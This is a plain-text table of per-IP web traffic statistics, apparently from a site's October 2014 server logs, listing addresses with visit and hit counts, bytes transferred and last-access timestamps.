65.52.104.211 0 1 113950 
174.242.240.230 2 28 687563 20141017192007
98.219.181.16 5 33 796659 20141029194459
76.69.100.211 1 1 67042 20141027105039
71.61.46.158 1 1 67042 20141007001032
199.234.90.149 5 71 1732667 20141029094127
173.252.102.115 0 3 76211 
23.254.0.186 1 1 61472 20141013041356
98.219.139.204 4 56 720670 20141007072125
192.99.40.137 6 6 0 20141017001847
54.83.192.61 8 8 171257 20141031144253
74.111.164.214 3 30 710170 20141005081745
71.60.114.192 3 30 724423 20141008161150
207.46.13.88 0 1 566 
71.61.20.160 4 32 710245 20141029195835
209.248.102.179 5 46 1132080 20141019230442
54.68.196.86 2 2 87904 20141030144059
71.126.35.48 5 45 1104392 20141002214706
61.135.169.55 0 1 24853 
209.147.118.225 0 8 113047 
198.199.71.16 11 19 474467 20141030041537
8.225.196.9 1 25 641262 20141010094801
173.252.102.119 0 1 29208 
202.46.49.123 1 1 67042 20141001091055
93.159.230.89 1 15 277438 20141009130053
54.172.194.236 1 1 0 20141030193058
67.172.167.208 1 25 641262 20141015153939
174.130.24.39 2 28 687563 20141004112652
123.125.71.73 1 4 34857 20141031152721
104.154.20.8 1 1 67042 20141004213958
166.102.7.157 3 43 1045104 20141003141729
123.125.71.116 0 3 7661 
109.120.157.179 12 12 221184 20141030031602
107.77.80.21 0 2 24476 
174.250.112.46 2 29 712416 20141017144211
24.23.104.176 2 30 761145 20141002201353
71.60.68.117 3 44 1045104 20141028212509
98.16.119.187 1 25 641262 20141030220148
193.201.224.103 1 1 67042 20141030221859
158.83.98.75 3 41 1065845 20141006092107
71.60.111.83 1 25 641262 20141017230917
123.125.71.76 0 1 566 
179.179.192.212 1 1 67042 20141010094601
205.166.218.67 2 40 998803 20141015141533
23.251.154.51 1 1 67042 20141014105947
192.104.67.122 3 30 709683 20141014091825
71.60.36.192 2 28 687563 20141028114543
144.76.155.8 7 7 323626 20141029140834
54.172.91.125 1 1 61472 20141022181456
64.12.117.11 0 1 32785 
150.70.97.116 0 1 566 
50.197.59.149 6 34 917036 20141003102952
12.108.121.5 1 25 641262 20141007125449
98.16.115.216 5 48 1129689 20141006171510
54.172.142.224 1 1 0 20141016225308
209.147.118.50 1 6 100110 20141005180156
64.134.68.26 3 45 1107299 20141010232948
72.77.96.91 2 28 687563 20141014182632
95.20.210.135 1 25 641262 20141008145611
199.30.24.105 0 2 28511 
68.71.44.11 2 50 1282524 20141012091349
73.183.95.173 2 28 687563 20141006121948
24.23.14.200 0 1 12238 
69.171.187.92 2 28 664670 20141018084618
123.125.68.11 1 1 59809 20141031000136
66.87.114.71 1 6 166340 20141005025232
96.250.46.166 0 1 12238 
61.135.190.103 7 24 1090216 20141014003922
71.31.183.205 2 28 687563 20141017154608
123.125.68.187 1 1 22408 20141029034358
159.63.0.210 5 46 1120506 20141006103001
38.99.97.8 1 1 18432 20141020075815
72.95.161.53 1 26 641262 20141017224104
98.236.136.235 2 28 687563 20141012162858
54.164.220.217 1 1 67042 20141018040026
54.215.245.123 1 1 67042 20141009122946
146.148.65.237 1 1 67042 20141012105940
203.125.255.188 1 25 641262 20141029041347
61.135.190.71 0 4 89973 
82.80.234.142 0 4 70286 
118.100.117.195 1 25 641262 20141019095311
69.58.178.58 10 10 348404 20141011113134
187.37.129.81 1 25 641262 20141001072601
50.31.105.183 2 2 41724 20141008231250
150.70.97.119 0 2 1132 
112.198.180.86 1 26 659974 20141002190807
192.169.59.190 1 1 67042 20141002120331
173.252.77.117 0 1 29877 
99.17.0.236 1 25 641262 20141011193441
70.199.6.100 1 25 641262 20141029123647
173.252.100.119 0 1 42728 
74.98.207.76 5 34 603292 20141007204636
174.236.226.244 2 28 687563 20141011145306
130.211.117.219 1 1 67042 20141021111852
173.75.1.213 4 44 1112146 20141011124603
198.252.44.4 2 2 134084 20141022112208
72.95.204.54 2 28 687563 20141017215303
37.48.40.156 0 1 27033 
82.80.249.164 0 1 29290 
91.221.99.35 1 1 67042 20141003165619
54.84.174.39 1 1 67042 20141011152334
111.10.88.143 1 1 0 20141029074558
79.49.72.231 1 28 701168 20141007122635
157.55.39.245 0 1 23762 
123.125.68.157 1 1 21334 20141031000234
96.236.199.42 10 57 1263189 20141007110729
54.80.77.147 4 4 183462 20141004195317
64.164.109.2 0 1 19454 
73.52.242.112 2 13 244171 20141006173909
191.181.66.221 1 26 654811 20141015160325
1.83.202.127 1 1 67042 20141004001320
66.249.83.19 5 5 335210 20141022120244
209.147.118.58 0 1 566 
184.190.196.245 1 1 0 20141029110413
104.154.23.248 1 15 349805 20141029210435
69.48.38.192 1 8 172523 20141006203751
104.154.19.213 1 21 477734 20141005031654
24.3.87.62 1 1 67042 20141014205430
72.225.248.235 1 25 641262 20141015125932
71.112.135.22 1 12 177129 20141001222948
38.100.21.64 9 11 276570 20141018083125
54.173.132.171 1 1 67042 20141031114535
94.20.63.41 1 1 67042 20141030083733
123.125.71.105 0 4 64240 
123.125.71.94 0 1 0 
123.125.71.84 0 3 11800 
178.125.233.58 2 2 134084 20141027175100
180.149.143.13 0 1 28765 
123.125.71.75 0 2 3730 
69.95.253.202 2 50 1282524 20141007145058
108.39.171.230 2 28 687563 20141017220507
24.3.132.206 5 35 769768 20141014115509
54.161.237.245 2 2 134084 20141013174709
209.147.118.188 1 6 85714 20141019101553
76.125.140.138 1 25 641262 20141004034354
72.68.70.58 1 12 163935 20141012233126
65.55.218.37 1 5 79848 20141018135026
123.125.71.114 0 1 62481 
131.253.26.255 0 2 7387 
67.165.40.251 1 25 641262 20141028201455
104.154.20.78 1 21 477734 20141009204842
98.208.49.146 1 12 159175 20141020183737
207.91.54.206 3 29 556791 20141014095232
79.22.205.48 0 1 20008 
31.134.246.163 1 1 67042 20141031011847
108.202.106.51 0 1 35665 
159.253.189.72 1 26 666768 20141018233531
54.164.55.173 0 1 30402 
162.243.170.62 11 19 474467 20141006131025
207.255.212.67 2 28 687563 20141013221831
174.46.41.34 1 1 79029 20141015161816
71.61.230.76 7 62 1424867 20141006220236
74.109.209.243 3 43 1045104 20141016101843
173.48.129.158 0 1 27033 
202.150.151.82 1 1 67042 20141021004253
71.61.92.94 1 12 177129 20141029174058
208.54.36.240 1 25 641262 20141020193317
98.219.181.166 1 24 488369 20141012222556
88.198.140.4 2 2 134084 20141017123038
96.235.16.247 6 49 1105631 20141009120943
69.171.163.151 1 1 53736 20141018103326
63.87.61.78 3 29 754605 20141031095946
54.165.209.3 1 1 67042 20141006232604
173.252.120.117 0 2 43913 
130.185.139.213 1 1 67042 20141004023712
71.199.101.77 3 30 684995 20141007202505
173.252.102.117 0 1 32785 
123.125.71.78 0 1 1759 
72.45.41.66 2 28 687563 20141005184650
104.154.24.156 1 20 474076 20141027161052
96.47.224.50 0 20 475240 
121.200.54.100 6 6 206368 20141011171538
75.117.182.62 2 53 0 20141009220434
199.30.24.240 0 24 574220 
74.98.53.41 2 14 199250 20141014101028
208.94.41.99 4 45 1109072 20141006102815
73.40.155.31 4 31 758771 20141028093108
199.187.122.91 13 13 340383 20141006234207
64.12.116.135 0 1 35665 
222.239.162.7 1 1 67042 20141005182127
71.182.232.156 5 57 1442168 20141028183544
186.251.229.2 1 25 641262 20141006213135
75.156.54.65 2 28 687563 20141022154328
71.236.82.12 1 25 641262 20141021194421
130.211.236.206 1 21 477734 20141001005606
71.112.204.189 2 40 998803 20141010222359
38.107.146.35 1 25 641262 20141002145707
64.39.124.114 1 12 163935 20141020191506
208.94.40.234 3 43 1022211 20141001113324
24.239.39.102 2 28 687563 20141027165155
54.172.136.95 1 1 67042 20141030174755
71.236.98.132 1 25 641262 20141011170019
23.20.58.23 2 18 345046 20141020034236
61.135.190.222 1 7 178745 20141028085002
176.102.38.75 1 1 67042 20141020212225
173.252.77.115 0 2 62208 
61.135.190.101 1 8 264422 20141012005656
70.193.131.237 0 1 12238 
61.135.165.21 0 1 33298 
158.85.89.5 3 3 109655 20141030025924
146.148.81.102 1 1 67042 20141005110220
205.237.88.140 2 2 134084 20141004230629
151.201.139.72 2 28 687563 20141008104641
107.77.90.80 3 30 709684 20141027111233
98.219.141.51 2 48 0 20141027205028
71.180.222.195 0 1 13549 
66.182.238.5 0 1 12238 
65.55.211.212 0 1 8246 
62.210.209.22 1 1 67042 20141007122615
166.137.244.85 3 51 1152729 20141008032606
71.61.229.211 6 49 1146739 20141016001040
24.131.229.151 1 25 641262 20141020150207
76.125.141.96 2 28 687563 20141017204537
70.199.0.233 1 1 0 20141003093342
54.172.30.212 0 1 62481 
98.219.177.245 4 35 157675 20141016184832
79.119.153.196 0 1 29877 
78.37.141.74 0 1 35665 
54.88.164.137 1 1 20980 20141012145917
73.183.114.108 1 26 676927 20141001173031
72.28.199.147 2 28 687563 20141003121128
38.101.137.65 3 30 709684 20141020094639
54.165.181.158 0 1 23762 
146.148.78.24 1 1 67042 20141007110233
70.89.227.185 3 31 721520 20141014122053
183.223.170.72 1 1 67042 20141015185833
108.41.59.28 6 35 821453 20141031154107
123.125.68.180 1 1 22408 20141029034355
173.252.77.114 0 1 13549 
128.36.232.41 3 3 201126 20141005164202
151.74.73.19 1 25 641262 20141022142145
72.95.254.146 2 40 998803 20141005233131
192.184.48.186 1 1 67042 20141005224535
108.217.62.205 1 12 159175 20141005002727
208.80.194.127 3 3 110163 20141013233512
98.236.113.11 1 12 177129 20141018220442
71.236.108.51 3 43 1027150 20141007132409
209.147.118.186 1 4 30253 20141003233552
24.131.74.125 2 46 1118996 20141016174454
166.137.252.87 1 25 641262 20141016113323
70.199.1.77 1 25 641262 20141021144442
179.110.236.204 1 25 641262 20141020202837
24.3.239.99 4 19 253140 20141017232303
67.165.83.24 2 28 687563 20141021184301
93.174.93.210 1 1 67042 20141010004927
54.172.84.2 1 2 40257 20141011133646
69.171.187.18 1 2 17305 20141018084742
150.70.97.117 0 3 148724 
104.154.27.96 1 20 474076 20141017072910
61.135.190.223 1 2 129523 20141022124252
174.59.141.47 1 25 641262 20141018223019
71.61.183.70 2 40 998803 20141011180928
192.119.195.2 0 1 13549 
54.87.96.195 2 2 134084 20141004195102
207.166.26.208 0 1 12238 
71.112.44.139 2 28 687563 20141012192116
76.125.244.205 2 36 641262 20141019065737
209.195.180.218 1 25 641262 20141030124302
80.30.172.96 1 28 715357 20141001112253
130.49.188.69 1 25 641262 20141022121040
199.30.24.80 0 1 24853 
93.147.0.223 1 8 172523 20141005150641
24.218.142.249 0 16 308635 
70.198.198.221 5 56 1418474 20141002112606
104.154.16.176 1 1 67042 20141003035259
173.252.80.113 0 1 29877 
54.165.162.51 0 1 26283 
78.29.133.144 1 25 641262 20141014095257
150.70.97.120 0 1 566 
74.115.50.103 0 1 27033 
151.195.232.135 4 31 771699 20141029104635
70.199.1.208 1 12 177129 20141002195906
67.142.235.68 2 27 663869 20141010110330
95.25.150.249 1 11 147922 20141016164033
96.235.13.135 3 28 730425 20141011135604
64.12.116.7 0 1 42305 
169.2.71.36 0 1 19454 
176.102.38.73 2 2 134084 20141031123114
71.61.88.114 2 28 687563 20141027184440
123.125.71.103 0 1 62481 
76.125.243.47 3 5 474300 20141001155113
199.30.25.148 0 1 43 
146.148.87.15 1 1 67042 20141008110142
217.73.208.27 1 1 67042 20141018052408
189.103.129.25 1 1 67042 20141009172709
93.186.202.253 3 3 127803 20141021185412
54.165.160.150 1 1 18432 20141008131344
64.181.75.226 3 31 715910 20141027152503
54.165.102.73 1 1 22469 20141012073811
54.172.178.153 1 1 67042 20141013143916
192.185.4.135 1 1 67042 20141029180516
104.154.17.13 1 21 477734 20141018012349
108.3.91.62 1 25 641262 20141019144008
96.47.225.162 0 17 403954 
24.3.34.153 2 35 789880 20141002174734
74.111.184.176 1 25 641262 20141012003541
176.67.167.180 1 1 67042 20141005060734
70.198.193.191 1 3 91370 20141030123325
24.17.28.149 4 32 714112 20141028005704
90.195.73.151 0 2 15010 
74.82.64.160 3 38 887419 20141004210229
72.77.52.137 1 12 163935 20141012175449
204.236.213.1 2 18 301687 20141014214742
54.172.59.131 1 1 24689 20141005191650
50.121.55.201 0 1 12238 
69.171.163.211 1 1 53736 20141018101829
128.147.28.70 1 25 641262 20141021102044
190.10.14.37 1 1 67042 20141002235329
199.30.24.217 0 1 3658 
71.60.112.213 4 44 1112146 20141003121958
71.60.114.60 1 12 154236 20141021181557
104.154.28.57 1 8 172523 20141029132942
114.179.24.16 1 1 67042 20141018123206
166.137.240.109 2 28 687563 20141002194403
71.61.230.34 1 25 641262 20141005102610
123.125.71.81 0 1 8132 
71.206.223.185 3 30 707136 20141013201958
220.181.108.109 1 1 19021 20141031152721
66.87.115.69 1 12 0 20141029224339
70.199.12.219 2 28 687563 20141001101812
24.131.222.7 0 1 32785 
46.229.170.197 5 5 335210 20141030204328
109.42.2.244 0 1 35665 
70.184.205.146 0 1 12238 
76.125.157.59 3 43 1045104 20141008224021
173.252.102.113 0 4 110691 
177.126.90.132 1 19 592682 20141003173122
101.168.170.147 0 2 29358 
104.154.19.95 1 21 477734 20141006012414
50.248.80.105 1 25 641262 20141002103233
98.236.160.226 1 11 152460 20141002184513
98.236.5.146 1 25 641262 20141020222320
12.68.10.130 1 25 641262 20141011074204
75.88.7.26 1 25 641262 20141008104746
76.125.141.210 4 32 699165 20141029151232
61.135.190.68 0 2 0 
74.98.234.123 2 28 687563 20141030091857
144.80.93.57 2 28 687563 20141014152852
208.68.39.164 11 19 474467 20141001165414
173.252.74.116 0 1 22525 
130.211.232.137 1 20 474076 20141001234403
71.61.250.184 3 30 700860 20141014095428
54.173.22.203 1 1 67042 20141028062518
64.12.116.74 0 1 25506 
64.201.94.10 2 40 998803 20141027131250
198.228.228.163 1 1 0 20141007070257
24.3.63.44 4 31 749998 20141004183351
174.250.112.200 2 27 534670 20141019161725
71.236.89.227 4 39 801008 20141008052854
101.169.170.152 0 1 12238 
138.210.188.216 1 9 202400 20141016144159
54.172.8.53 0 1 1759 
173.75.30.141 1 12 177129 20141019110852
73.183.112.99 3 30 700860 20141002231418
70.194.166.177 2 27 657548 20141027165549
166.137.240.55 4 44 1112146 20141003180805
69.62.238.114 1 25 641262 20141019234205
211.244.83.215 6 6 402252 20141030181250
24.131.199.165 3 29 742261 20141013213114
50.197.49.33 2 40 998803 20141022111326
173.66.43.44 1 12 177129 20141001204824
146.148.82.60 1 1 67042 20141010105940
66.70.2.95 0 4 87644 
54.69.96.111 9 142 2675167 20141005184641
54.237.48.184 2 2 134084 20141001051821
166.137.244.57 1 10 32065 20141008083122
63.66.64.245 2 28 149008 20141008030100
54.172.247.117 1 1 0 20141029213545
71.60.14.103 1 25 641262 20141005194632
104.154.21.17 1 25 641262 20141022072213
77.236.192.248 1 1 67042 20141021174510
75.216.205.169 2 28 687563 20141004201817
64.12.117.17 0 2 32261 
74.82.68.145 1 3 33957 20141003211756
62.212.73.46 1 1 67042 20141009165229
70.199.1.63 1 11 0 20141011062809
70.198.195.27 4 45 1064677 20141030142444
199.30.24.57 0 1 24853 
54.160.6.19 4 36 603374 20141020034822
173.44.37.242 0 19 451478 
54.165.23.165 1 1 15136 20141013012655
146.148.38.23 1 1 67042 20141018111742
54.88.128.219 1 1 0 20141013201407
223.86.14.209 1 1 0 20141029102940
123.125.71.44 1 1 18951 20141031152724
96.236.129.54 4 73 1587109 20141018222559
176.31.126.199 1 1 67042 20141006033620
71.236.113.107 2 28 687563 20141002203258
54.80.101.29 1 9 172523 20141014213032
72.23.179.150 1 25 641262 20141018145513
104.154.26.94 1 8 172523 20141008021156
162.17.83.193 0 2 20569 
128.147.64.50 4 31 776725 20141001092516
209.105.210.130 0 1 12238 
63.138.8.248 1 1 67042 20141004183527
54.165.86.89 1 1 0 20141009122405
166.137.88.49 1 12 177129 20141021104746
150.70.97.115 1 1 129182 20141021210513
208.93.104.10 2 2 134084 20141013013434
12.4.234.238 3 22 694916 20141002131503
123.125.71.101 0 2 65812 
208.68.246.251 4 33 747161 20141006153830
71.60.102.238 6 49 1168710 20141003092445
67.163.229.224 1 25 641262 20141027194737
71.61.46.166 1 27 641262 20141005140745
205.132.76.4 2 28 687563 20141002131038
198.203.181.181 5 51 1289664 20141003160415
98.236.8.242 3 30 547967 20141002205226
180.191.66.55 0 12 259177 
74.109.215.169 2 28 675219 20141020200208
162.144.46.158 1 1 67042 20141004154628
23.95.93.217 2 2 91223 20141018055322
185.3.40.131 1 1 0 20141002070711
5.9.97.180 1 25 641262 20141018114454
70.208.198.30 2 28 687563 20141002230040
220.181.51.62 0 2 13749 
71.61.246.207 5 50 1090302 20141006085404
216.11.202.100 0 1 12238 
170.75.132.234 1 25 641262 20141017184941
166.137.252.25 4 61 1449721 20141011150217
166.216.165.128 2 24 0 20141008173118
130.211.151.187 1 1 67042 20141030111819
61.135.190.72 1 2 68801 20141003060051
209.147.118.209 1 8 123871 20141028074331
54.172.56.64 1 1 30465 20141004133620
123.125.71.88 0 1 0 
199.248.185.22 1 25 0 20141029154131
98.239.252.107 4 56 1350438 20141027105540
69.43.43.34 2 28 687563 20141012203214
71.60.190.137 5 46 1134266 20141010165340
70.198.200.3 1 12 177129 20141018173627
184.57.155.196 1 25 641262 20141005144641
61.135.190.104 1 11 351231 20141029233636
71.60.39.151 2 28 687563 20141007231416
70.199.4.123 9 55 1232566 20141031081835
24.131.221.75 2 28 687563 20141009232810
180.191.65.172 0 2 86243 
74.111.177.8 1 12 177129 20141010103759
71.61.228.213 4 32 729618 20141009215955
173.167.249.5 1 25 641262 20141013115637
123.125.68.33 1 1 90197 20141031000137
24.239.218.9 2 40 998803 20141006092326
176.9.25.25 1 1 67042 20141030104611
108.251.137.185 0 1 19454 
66.176.162.157 0 1 12238 
71.195.84.61 1 25 641262 20141006114052
42.98.26.174 1 1 47714 20141011153524
54.172.106.239 1 1 61472 20141007110728
24.101.224.50 2 28 687563 20141022090336
54.237.25.72 1 1 67042 20141014213655
74.92.58.81 3 30 686571 20141031105949
173.167.249.113 2 50 1282524 20141029141159
69.171.187.8 1 2 32955 20141018084957
123.125.68.38 1 1 59809 20141031000236
98.239.238.212 2 28 687563 20141002190906
71.13.130.2 0 1 12238 
166.216.165.22 2 66 1611492 20141003201153
208.87.234.180 4 45 1066278 20141015155450
24.131.25.20 3 43 1025446 20141018103554
23.23.43.122 2 2 0 20141028133613
24.154.32.81 1 1 0 20141019114050
88.80.186.116 2 2 134084 20141031132923
104.154.20.164 1 20 474076 20141019001542
54.164.211.185 1 1 0 20141030020052
71.9.26.50 0 1 7505 
104.154.25.236 1 1 67042 20141006055437
98.21.169.181 4 32 724170 20141016162206
189.103.15.18 1 26 654811 20141004225435
178.32.5.32 2 2 134084 20141011024612
104.56.200.182 1 12 168029 20141008022534
71.60.148.29 4 31 776726 20141018163749
183.222.158.141 1 1 0 20141029082041
65.55.211.249 0 2 86243 
186.215.144.207 0 5 147412 
166.137.252.107 0 12 61592 
174.250.112.122 1 25 641262 20141011190128
64.12.116.72 0 1 31277 
98.239.198.178 3 30 709684 20141006103548
75.149.22.49 3 40 715910 20141018202026
128.2.23.60 2 27 534670 20141027132622
190.160.89.173 1 34 880607 20141009161556
173.79.158.74 3 75 706355 20141010184010
54.172.100.228 1 1 0 20141006175918
212.67.221.214 2 2 134084 20141006214852
71.60.3.32 7 51 1174648 20141013221006
104.154.22.156 1 25 641262 20141014194836
94.153.65.124 12 12 221184 20141012095407
146.148.73.18 1 1 67042 20141003110431
98.236.253.73 3 29 754605 20141017170218
64.233.172.99 4 29 844628 20141014085244
67.20.241.151 3 30 709684 20141006174226
38.98.181.23 0 1 27033 
98.236.3.139 5 46 1134267 20141027170729
54.172.111.217 1 1 24689 20141008143131
108.170.214.24 1 25 641262 20141001010243
54.86.116.72 1 1 67042 20141007124526
162.51.201.241 1 25 641262 20141028195023
192.99.141.252 1 1 20980 20141029051515
66.249.93.29 0 1 7505 
158.83.73.227 1 25 641262 20141006212506
130.211.120.230 1 1 67042 20141027111804
173.252.100.113 0 1 42728 
166.137.242.87 0 1 2376 
158.83.180.8 2 28 687563 20141016141623
199.46.115.38 0 1 12238 
69.171.230.114 0 1 21388 
131.253.24.159 0 1 1759 
76.125.255.215 2 28 687563 20141005123125
150.212.113.28 1 6 109476 20141010105755
123.125.71.83 0 1 23762 
108.48.111.180 2 40 998803 20141029202319
187.3.229.190 1 25 641262 20141019111636
2.30.223.66 0 1 23295 
104.154.18.88 1 15 349805 20141005023925
54.172.6.56 1 1 20534 20141001043812
71.88.220.227 0 1 29877 
82.80.244.52 0 2 85720 
71.245.188.69 3 43 1045104 20141007013116
107.17.135.190 1 12 177129 20141022120220
209.255.143.195 7 51 1176006 20141003122804
54.160.50.242 2 2 134084 20141020033656
108.179.14.83 1 11 168996 20141007162707
173.252.77.119 0 1 18712 
200.223.88.213 1 25 641262 20141016223441
72.10.101.161 0 2 40888 
173.44.37.234 0 17 403954 
58.107.0.70 2 28 687563 20141012192700
177.82.226.8 1 25 641262 20141001210205
123.30.175.246 1 1 67042 20141017173915
71.60.58.124 1 25 641262 20141021145116
72.23.170.200 1 25 641262 20141011110048
158.85.89.6 14 14 304828 20141031093711
74.82.68.160 0 1 1002 
74.51.167.124 5 43 753854 20141020194911
64.12.117.19 0 1 29877 
123.125.68.50 1 1 60130 20141031000133
70.198.193.230 2 28 687563 20141028121951
74.82.64.145 0 15 390228 
98.239.233.144 2 28 687563 20141017113142
174.250.0.149 3 30 709683 20141012184614
54.85.203.15 1 1 18793 20141012052453
76.103.51.97 5 34 751738 20141022124830
64.12.116.136 0 1 0 
24.3.218.118 1 25 641262 20141010211757
54.89.82.131 1 1 19629 20141029085428
71.60.61.207 4 31 776726 20141001160817
75.88.0.66 1 25 641262 20141031150453
174.129.124.202 2 18 345046 20141001052050
209.147.118.157 0 3 9347 
68.71.44.10 1 25 641262 20141012091455
24.3.61.74 2 28 669609 20141002084304
24.131.250.150 1 25 641262 20141030154845
71.182.237.167 2 14 199250 20141011151103
38.104.121.26 5 70 1708973 20141007170158
54.172.93.162 1 1 67042 20141006114140
66.190.194.32 0 1 12238 
165.190.74.232 0 1 32785 
199.30.25.114 0 1 5617 
173.252.102.118 0 2 56853 
54.84.145.85 1 1 0 20141004151351
54.88.113.70 1 1 67042 20141003005928
54.80.177.118 1 1 67042 20141021174510
89.178.209.246 1 12 157569 20141013213538
123.125.71.96 0 2 29379 
123.125.71.106 0 1 1759 
67.172.24.181 0 3 51218 
70.198.194.224 5 32 6452690 20141002210112
61.135.169.54 0 1 65093 
73.40.174.188 1 12 177129 20141011134126
76.125.218.113 2 40 998803 20141006173102
66.87.135.154 1 25 641262 20141012094516
207.172.186.71 3 3 0 20141031062747
61.135.190.220 3 10 437225 20141011083934
61.135.190.200 0 1 0 
108.171.131.189 4 44 1112146 20141015142219
54.165.233.193 0 3 50086 
76.125.241.230 1 25 641262 20141017111414
104.154.25.51 1 25 641262 20141027153357
81.243.123.48 1 25 641262 20141014144620
24.3.70.184 1 25 641262 20141014183532
144.80.60.134 1 25 641262 20141016132526
144.76.163.48 7 7 210111 20141016215233
67.165.104.150 1 16 376563 20141003233619
74.82.64.144 1 11 308683 20141004205944
123.125.68.147 1 1 60130 20141031000231
98.16.119.224 2 28 687563 20141021190617
180.149.143.19 0 1 26543 
54.164.32.54 0 1 30854 
54.165.41.204 1 1 30465 20141012210828
54.88.39.81 1 1 67042 20141003005756
173.252.120.114 0 1 22525 
24.3.167.51 3 49 836512 20141006183854
93.100.184.156 0 1 12238 
220.181.51.40 1 2 129523 20141001023540
76.164.225.90 2 2 134084 20141003053004
220.181.51.39 0 2 4923 
66.87.114.77 2 15 205476 20141008072012
130.49.72.124 2 28 687563 20141028194739
73.52.243.167 1 25 641262 20141019042359
213.133.97.216 3 3 67042 20141030220606
178.149.117.35 1 25 641262 20141019104555
64.12.116.142 1 1 67042 20141008211913
174.242.241.226 3 17 237488 20141013224458
70.90.237.177 2 28 664670 20141013054343
104.154.17.44 1 21 477734 20141029210836
54.164.170.116 1 1 24689 20141004080200
98.157.75.189 4 18 238757 20141027231149
104.154.16.137 1 1 67042 20141014171041
123.125.71.117 0 1 23762 
216.172.56.37 1 1 67042 20141006094534
210.199.227.18 1 1 67042 20141017014114
24.131.25.72 2 14 196702 20141010165930
108.32.1.128 1 25 641262 20141014175128
146.148.84.228 1 1 67042 20141011105925
70.198.194.136 2 40 998803 20141002194006
64.12.116.70 0 1 24853 
104.154.19.108 1 25 641262 20141017235118
123.125.71.91 0 2 62481 
123.125.71.40 1 1 67042 20141028065047
70.199.3.148 3 43 1045104 20141010215238
54.160.42.35 1 1 67042 20141014212103
104.154.18.147 1 10 216741 20141020182237
66.249.83.99 12 13 816742 20141022080519
72.65.237.226 1 12 177129 20141003130322
204.195.130.22 2 28 687563 20141016061821
69.171.187.85 2 3 79377 20141018084849
98.17.19.36 2 28 687563 20141012135525
72.77.105.106 3 43 1025446 20141009230640
24.154.120.113 3 43 1045104 20141030164429
146.148.87.148 1 1 67042 20141019111728
72.95.191.118 1 12 177129 20141021133100
165.155.200.112 0 1 12238 
73.52.209.131 0 1 12238 
50.199.172.137 1 25 641262 20141001220754
211.244.83.248 2 2 134084 20141015031245
220.181.108.167 1 1 17742 20141031152721
54.165.81.35 1 1 15484 20141012081739
66.87.114.128 1 12 177129 20141002185023
71.199.115.101 1 12 177129 20141016170857
209.147.118.103 0 3 86809 
174.250.64.126 0 1 0 
134.249.77.209 3 3 55296 20141031062343
141.158.213.81 1 25 641262 20141018074639
71.206.254.103 1 25 641262 20141030203648
31.51.214.50 1 12 157471 20141005113654
98.239.236.64 6 49 1108918 20141001191756
174.250.113.63 2 28 687563 20141003195555
98.236.249.141 1 25 641262 20141017133224
24.3.70.37 3 31 715910 20141003235017
173.252.80.119 0 1 26543 
71.60.150.163 4 47 1267487 20141021155002
166.137.242.123 2 14 181782 20141011133637
88.21.165.213 1 25 641262 20141008083556
130.49.19.171 1 25 641262 20141028200152
54.86.244.12 1 1 0 20141007150620
98.111.105.213 1 25 641262 20141016033813
89.234.68.89 6 6 202083 20141009105836
123.30.175.241 2 2 134084 20141030004601
75.149.14.38 2 42 1041117 20141021134626
78.158.11.226 4 4 132686 20141014130046
184.167.12.97 1 25 641262 20141003151120
123.125.71.110 0 2 10628 
96.47.224.42 0 20 475240 
71.61.21.89 5 46 1134267 20141027115222
68.5.184.188 3 43 1045104 20141005200859
24.3.75.113 6 35 831181 20141004155024
74.74.73.9 1 20 474076 20141028103150
71.60.109.224 3 30 703849 20141002192217
73.174.30.107 4 56 1375126 20141020174400
54.165.150.223 0 1 0 
54.172.100.201 1 1 67042 20141007124346
67.101.139.182 6 35 800620 20141030081601
123.125.68.155 1 1 124243 20141031000232
54.164.51.59 1 2 45511 20141004155359
64.12.116.201 0 1 1759 
54.164.161.209 1 1 0 20141030183638
23.25.72.81 3 30 709684 20141007200606
24.131.98.168 1 25 641262 20141002112423
110.34.195.178 1 1 67042 20141005163654
174.242.225.197 3 16 218823 20141002171029
69.63.111.46 2 28 687563 20141022124319
71.206.250.74 1 25 641262 20141009181400
64.12.116.202 0 1 62481 
69.171.163.75 7 7 376152 20141018123114
66.87.114.188 2 14 199249 20141029100419
123.125.71.108 0 2 6183 
113.254.0.163 1 25 641262 20141011150438
24.3.67.86 7 61 1411843 20141012144909
213.110.133.221 3 3 55296 20141022091219
67.163.131.136 1 26 659927 20141007105846
130.211.116.83 1 1 67042 20141028111753
87.78.211.202 3 29 736651 20141021125241
86.138.217.52 0 1 4826 
108.32.13.137 1 25 641262 20141008125944
78.46.156.162 1 1 67042 20141003172444
54.80.230.186 1 1 67042 20141008013440
104.154.20.87 1 21 477734 20141018074423
172.246.129.195 2 2 59902 20141010082358
125.27.26.55 1 25 641262 20141020003933
24.131.74.53 7 25 311135 20141010100524
61.135.190.198 0 1 23762 
67.183.86.80 1 13 187483 20141017204635
100.6.6.175 2 40 998803 20141014145929
144.76.100.150 5 27 871274 20141020215727
71.60.147.111 5 36 764630 20141019115752
180.191.64.83 1 6 151396 20141021111418
54.88.224.121 0 1 5617 
76.125.140.14 2 28 687563 20141028000337
66.86.175.136 1 25 641262 20141027123153
146.148.78.59 1 1 67042 20141002105834
159.224.139.133 1 1 67042 20141011101618
70.198.192.42 2 28 687563 20141003124419
24.3.68.135 1 25 641262 20141008190002
180.106.145.186 1 1 67042 20141014234904
104.154.21.145 1 21 477734 20141017225837
176.15.145.26 1 1 67042 20141017022228
50.248.74.113 2 27 663869 20141021100953
70.199.2.158 2 28 687563 20141011190348
188.40.54.199 2 2 134084 20141019013902
24.182.147.198 0 1 23295 
64.233.172.19 8 79 2258430 20141029170357
12.3.236.140 1 25 641262 20141030174439
177.68.60.124 1 24 606283 20141003093438
141.189.113.1 6 49 1514286 20141016123723
54.172.79.148 1 2 39804 20141004184104
76.125.157.229 1 25 641262 20141012210242
71.61.23.133 1 25 641262 20141021193119
75.88.6.215 1 25 641262 20141001002346
65.205.5.170 0 6 0 
54.165.240.147 1 1 24689 20141010212640
108.39.245.147 2 27 660835 20141018134225
98.80.129.150 0 1 12238 
181.211.160.180 1 28 697909 20141019203931
71.60.96.37 1 12 177129 20141009170516
123.125.71.95 0 1 8132 
64.12.116.8 0 1 5617 
201.24.93.27 1 25 641262 20141016031049
123.125.71.104 0 2 2564 
64.12.116.133 0 1 27645 
98.16.113.248 1 12 177129 20141008125905
201.41.46.7 1 30 759459 20141013114548
173.252.77.116 0 1 32785 
71.61.201.77 1 12 155140 20141011215426
128.2.21.179 2 14 199250 20141017150537
69.35.177.182 2 35 827599 20141001202858
150.70.97.122 0 1 62481 
71.60.125.138 2 13 177129 20141003130940
61.135.190.221 2 5 282808 20141021043541
209.147.118.212 0 5 98105 
173.252.80.112 0 3 75099 
94.67.103.34 1 26 659974 20141009105801
